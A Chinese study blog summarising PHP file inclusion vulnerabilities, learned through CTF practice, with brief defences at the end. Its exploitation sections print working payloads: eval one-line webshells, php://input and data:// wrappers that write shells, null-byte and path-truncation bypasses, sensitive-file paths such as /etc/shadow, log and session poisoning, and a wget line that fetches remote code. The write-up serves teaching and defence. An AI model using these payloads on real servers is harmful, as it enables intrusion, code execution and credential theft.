文件包含漏洞

前言

因为之前做过文件包含漏洞的Web题，了解了一点文件包含漏洞的一些知识，但并没有总结。所以现在重新学习并总结了一下文件包含漏洞。

文件包含漏洞

文件包含的简介

服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，您只更新一个包含文件就可以了，或者当您向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。

文件包含的原理

PHP中提供了四个文件包含的函数，分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含，但作用并不一样。

• require：找不到被包含的文件时会产生致命错误，并停止脚本。
• include：找不到被包含的文件时只会产生警告，脚本将继续执行。
• include_once：和include()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。
• require_once：和require()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。

文件包含的分类
PHP中的文件包含分为本地包含和远程包含。
1、本地包含 Local File Include (LFI)

1.所包含文件内容符合PHP语法规范：任何扩展名都可以被PHP解析。
2.包含非PHP语法规范源文件，会暴露其源代码。

例如：
test1.php代码如下：

<?php
$a='abc';
echo $a; 
?>

test2.php代码如下：

<?php include("test1.php"); ?>

执行test2.php，会输出 abc。

如果test2.php包含的是一个 txt文件，并且这个txt文件内容符合php语法规则，则txt文件会被当成php文件执行。如果包含非php语法规则的内容，则会暴露其源代码。

2、远程包含 Remote File Include (RFI)
如果要使用远程包含功能，首先需要确定PHP是否已经开启远程包含功能选项（php默认关闭远程包含功能：allow_url_include=off），开启远程包含功能需要在php.ini配置文件中修改。

远程包含与本地包含没有区别，无论是哪种扩展名，只要遵循PHP语法规范，PHP解析器就会对其解析。

例如：
创建abc.txt文件，文件内容符合PHP语法规则。
我们将test2.php的内容修改为：

<?php include($_GET['page']); ?>

此时，在url中输入：http://www.XXXX.com/test2.php?page=http://www.XXXX.com/abc.txt
将会执行abc.txt的内容。

文件包含漏洞的成因

在包含文件时候，为了灵活包含文件，将被包含文件设置为变量，通过动态变量来引入需要包含的文件时，用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过，这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。
例如：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

$_GET['filename']参数开发者没有经过严格的过滤，直接带入了include的函数，攻击者可以修改$_GET['filename']的值，执行非预期的操作。

文件包含漏洞的危害

通过文件包含漏洞，可以读取系统中的敏感文件，源代码文件等，如密码文件，通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户，甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含，文件包含漏洞还可能导致执行任意代码。

文件包含漏洞分类

1、本地文件包含漏洞

当包含的文件在服务器本地时，就形成了本地文件包含。

1.无限制本地文件包含漏洞

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

测试结果：
通过目录遍历漏洞可以获取到系统中其他文件的内容。

常见的敏感信息路径：
Windows系统

c:\boot.ini // 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件
c:\windows\repair\sam // 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.ini // MySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
c:\windows\php.ini // php 配置信息

Linux/Unix系统

/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件

2.session文件包含漏洞

条件：
session的存储位置可以获取。
session存储位置的获取

1、通过phpinfo的信息可以获取到session的存储位置。
通过phpinfo的信息，获取到session.save_path为/var/lib/php/sessions：

2、 通过猜测默认的session存放位置进行尝试。

linux下默认存储在/var/lib/php/session(s)目录下。
windows下(如果用的是phpstudy集成环境，且phpstudy在C盘根目录的话)默认存储在C:\phpStudy\PHPTutorial\tmp\tmp

session中的内容可以被控制，传入恶意代码。
示例代码：

<?php
session_start();
$ctfs=$_GET['ctfs'];
$_SESSION["username"]=$ctfs;
?>

漏洞分析

此php会将获取到的GET型ctfs变量的值存入到session中。
当访问http://www.XXXX.com/LFI2.php?ctfs=ctfs 后，会在/var/lib/php/sessions目录下存储session的值。
session的文件名为sess_+sessionid，sessionid可以通过开发者模式获取。

所以session的文件名为sess_aisf1tieidskl22nlc4hqf60h5。
到服务器的/var/lib/php/sessions目录下查看果然存在此文件，内容为：

漏洞利用

通过上面的分析，可以知道ctfs传入的值会存储到session文件中，如果存在本地文件包含漏洞，就可以通过ctfs写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码getshell。

当访问http://www.XXXX.com/LFI2.php?ctfs=<?php phpinfo();?>后，会在/var/lib/php/sessions目录下存储session的值。

本地查看是否存储成功

攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置，文件名称通过开发者模式可获取到，然后通过文件包含的漏洞解析恶意代码getshell。

当然也可以把<?php phpinfo();?>换成一句话木马<?php @eval($_POST['a']);?>：

3.有限制本地文件包含漏洞绕过

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename . ".html");
?>

%00截断

条件：magic_quotes_gpc = Off php版本<5.3.4
测试结果：

http://www.filename.com/LFI3.php?filename=phpinfo.php%00

路径长度截断

条件：windows OS，点号需要长于256；linux OS 长于4096

Windows下目录最大长度为256字节，超出的部分会被丢弃；
Linux下目录最大长度为4096字节，超出的部分会被丢弃。

EXP：

http://www.filename.com/LFI3.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

点号截断

条件：windows OS，点号需要长于256
EXP：

http://www.filename.com/LFI3.php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

2、远程文件包含漏洞

PHP的配置文件allow_url_fopen和allow_url_include设置为ON，include/require等包含函数可以加载远程文件，如果远程文件没经过严格的过滤，导致了执行恶意文件的代码，这就是远程文件包含漏洞。

allow_url_fopen = On(是否允许打开远程文件)
allow_url_include =On(是否允许include/require远程文件)

1.无限制远程文件包含漏洞

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

测试结果：
通过远程文件包含漏洞，包含php.txt可以解析。

http://www.filename.com/RFI1.php?filename=http://192.168.204.128/wenjian/php.txt

2.有限制远程文件包含漏洞绕过

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename . ".html");
?>

代码中多添加了html后缀，导致远程包含的文件也会多一个html后缀。

问号绕过

http://www.filename.com/RFI2.php?filename=http://192.168.204.128/wenjian/php.txt?

#号绕过

http://www.filename.com/RFI2.php?filename=http://192.168.204.128/wenjian/php.txt%23

还有哪些可以绕过？用burp跑一遍发现空格也可以绕过：

空格绕过

http://www.filename.com/RFI2.php?filename=http://192.168.204.128/wenjian/php.txt%20

使用windows环境(把测试代码放在windows的Web目录下)测试失败

%00截断

http://www.filename.com/RFI2.php?filename=http://192.168.204.128/wenjian/php.txt%00

同样，把php.txt文件内容换成一句话木马<?php @eval($_POST['a']);?>，可拿到webshell。

PHP伪协议

PHP 带有很多内置 URL 风格的封装协议，可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议，还能通过 stream_wrapper_register() 来注册自定义的封装协议。

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

php:// 输入输出流
PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter（本地磁盘文件进行读取）

元封装器，设计用于”数据流打开”时的”筛选过滤”应用，对本地磁盘文件进行读写。
用法：

?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php

两者效果一样。
条件：只是读取，需要开启 allow_url_fopen，不需要开启 allow_url_include；
测试代码：

<?php
$filename = $_GET['filename'];
include($filename);
?>

测试结果：

php://input
可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。
用法：?file=php://input 数据利用POST传过去。

php://input （读取POST数据）

碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据，具体函数意义下一项；
测试代码：

<?php
echo file_get_contents("php://input");
?>

测试结果：

php://input（写入木马）

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP < 5.3.0）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行。
如果POST的数据是执行写入一句话木马的PHP代码，就会在当前目录下写入一个木马。

<?PHP fputs(fopen('webshell.php','w'),'<?php @eval($_POST[a])?>');?>

测试结果：

php://input（命令执行）

测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP < 5.30）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行；
测试结果：

file://伪协议 （读取文件内容）

通过file协议可以访问本地文件系统，读取到文件的内容。不受allow_url_fopen与allow_url_include的影响。
测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

用法：file://文件绝对路径 file://C:/Windows/system.ini

测试结果：

data://伪协议
数据流封装器，和php://相似都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过你输入payload来实现目的；

data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4

data://（读取文件）

和php伪协议的input类似，碰到file_get_contents()来用；

<?php // 打印 “I love PHP” echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo=’); ?>

注意：<span style="color: rgb(121, 121, 121);"><?php phpinfo();,这类执行代码最后没有?></span>闭合;

如果php.ini里的allow_url_include=On（PHP < 5.3.0）,就可以造成任意代码执行，同理在这就可以理解成远程文件包含漏洞（RFI）
测试代码：

<?php
$filename = $_GET['filename'];
include($filename);
?>

测试结果：

phar://伪协议

这个参数是就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压。
用法：?file=phar://压缩包/内部文件 phar://xxx.png/webshell.php
注意： PHP > =5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。
步骤： 写一个一句话木马文件webshell.php，然后用zip协议压缩为webshell.zip，然后将后缀改为png等其他格式。
测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

测试结果：

zip://伪协议

zip伪协议和phar协议类似，但是用法不一样。
用法：?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#webshell.php。
条件： PHP > =5.3.0，注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23，否则浏览器默认不会传输特殊字符。
测试代码：

<?php
$filename  = $_GET['filename'];
include($filename);
?>

测试结果：

文件包含漏洞利用

（一）读取敏感文件

（二）远程包含shell

allow_url_fopen为ON时，可以尝试远程包含一句话木马。

访问http://www.xxx.xom/index.php?page=http://www.filename.com/echo.txt，
远程http://www.filename.com/下的echo.txt文件内容为：
  <?fputs(open("webshellshell.php","w"),"<?php @eval($_POST[a]);?>")?>

（三）本地包含配合文件上传

上传一句话图片木马，得知图片路径(/upload/1.jpg)，图片代码为：

<?fputs(open("webshell.php","w"),"<?php @eval($_POST[a]);?>")?>

访问http://www.xxx.xom/index.php?page=./upload/1.jpg，包含这张图片并在index.php所在目录生成webshell.php。

（四）使用PHP封装协议

PHP带有很多内置URL风格的封装协议，这类协议与fopen()、copy()、file_exists()、file size()等文件系统函数所提供的功能类似。
1、使用封装协议读取PHP文件：

http://www.filename.com/RFI1.php?filename=php://filter/read=convert.base64-encode/resource=x.php

2、写入PHP文件：

http://www.filename.com/RFI1.php?filename=php://input
post传参：<?PHP fputs(fopen('webshell.php','w'),'<?php @eval($_POST[a])?>’);?>

测试一下，写马成功

（五）包含Apache日志文件
Apache服务器运行后会生成两个日志文件，这两个文件是access.log(访问日志)和error.log(错误日志)，apache的日志文件记录下我们的操作，并且写到访问日志文件access.log之中。
日志默认路径

(1)apache+Linux日志默认路径/etc/httpd/logs/access_log或者/var/log/httpd/access log
(2) apache+win2003日志默认路径
(3) IIS6.0+win2003默认日志文件 C:WINDOWSsystem32Logfiles
(4) IIS7.0+win2003 默认日志文件 %SystemDrive%inetpublogsLogFiles
(5) nginx 日志文件在用户安装目录的logs目录下。如安装目录为/usr/local/nginx,则日志目录就是在/usr/local/nginx/logs里。也可通过其配置文件Nginx.conf，获取到日志的存在路径(/opt/nginx/logs/access.log)

web中间件默认配置

(1) apache+linux 默认配置文件/etc/httpd/conf/httpd.conf或者index.php?page=/etc/init.d/httpd
(2)IIS6.0+win2003 配置文件 C:/Windows/system32/inetsrv/metabase.xml
(3)IIS7.0+WIN 配置文件 C:WindowsSystem32inetsrvconfigapplicationHost.config

（六）截断包含
只适用于magic_quotes_gpc=off的情况，如果为on，%00（NULL）将会被转义，从而无法正常截断。
（七）绕过WAF防火墙
（八）包含session
参考本地文件包含漏洞：session文件包含漏洞
（九）包含/proc/self/environ文件

• 利用条件：
  1、php以cgi方式运行，这样environ才会保持UA头。
  2、environ文件存储位置已知，且environ文件可读。
• 姿势：
  proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码，则php代码会被写入到environ中。 之后再包含它，即可。
  ?file=…/…/…/…/…/…/…/proc/self/environ 选择User-Agent

写代码如下：

 <?system('wget http://www.yourweb.com/oneword.txt -O webshell.php');?>

然后提交请求。
（十）包含临时文件
php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临 时文件被删除之前，利用竞争即可包含该临时文件。

由于包含需要知道包含的文件名。
方法一：进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有 65535中不同的文件名，所以这个方法是可行的。
方法二：phpinfo来获取临时文件的路径以及名称,然后临时文件在极短时间被删除的时候,需要竞争时间包含临时文件拿到webshell

文件包含漏洞防御

1、严格判断包含中的参数是否外部可控。
2、路径限制
3、包含文件验证
4、尽量不要使用动态包含，可以在需要包含的页面固定写好
5、PHP 中使用 open_basedir 配置限制访问在指定的区域
6、过滤.（点）/（反斜杠）\（反斜杠）
7、禁止服务器远程文件包含

绕过有防御的本地文件包含

<?php
$file = $_GET['file'];
include '/var/www/html/'.$file.'/test/test.php'; 
?>

这段代码指定了前缀和后缀:这样就很“难”直接去包含前面提到的种种文件。

绕过有防御的远程文件包含

<?php
$basePath = $_GET['path'];
require_once $basePath . "/action/m_share.php"; 
?>

参考博客：
文件包含漏洞
文件包含漏洞学习总结

写在后面

学文件包含漏洞，了解了php伪协议和文件包含漏洞的基础知识。收获很大，继续努力。
小白进阶ing